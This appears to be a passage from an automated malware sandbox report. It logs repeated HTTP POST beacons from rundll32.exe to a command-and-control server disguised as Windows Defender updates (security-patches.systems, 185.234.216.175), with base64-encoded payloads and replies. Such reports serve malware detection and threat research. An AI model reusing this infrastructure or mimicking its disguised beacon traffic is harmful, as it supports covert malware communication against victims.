                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:07.810081005 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:07 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449742185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:08.075721025 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:09.544920921 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:09 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449743185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:09.812864065 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:11.274260998 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:10 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449744185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:11.531900883 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:13.011755943 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:12 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449745185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:13.302762032 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:14.785376072 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:14 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449746185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:15.071516037 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:16.568165064 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:16 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449747185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:16.825575113 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:18.258492947 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:17 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449748185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:18.513912916 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:19.962135077 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:19 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449749185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:20.236934900 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:21.682352066 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:21 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449750185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:21.950834036 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:23.401829004 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:23 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449751185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:23.676794052 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:25.116084099 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:24 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449752185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:25.373133898 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
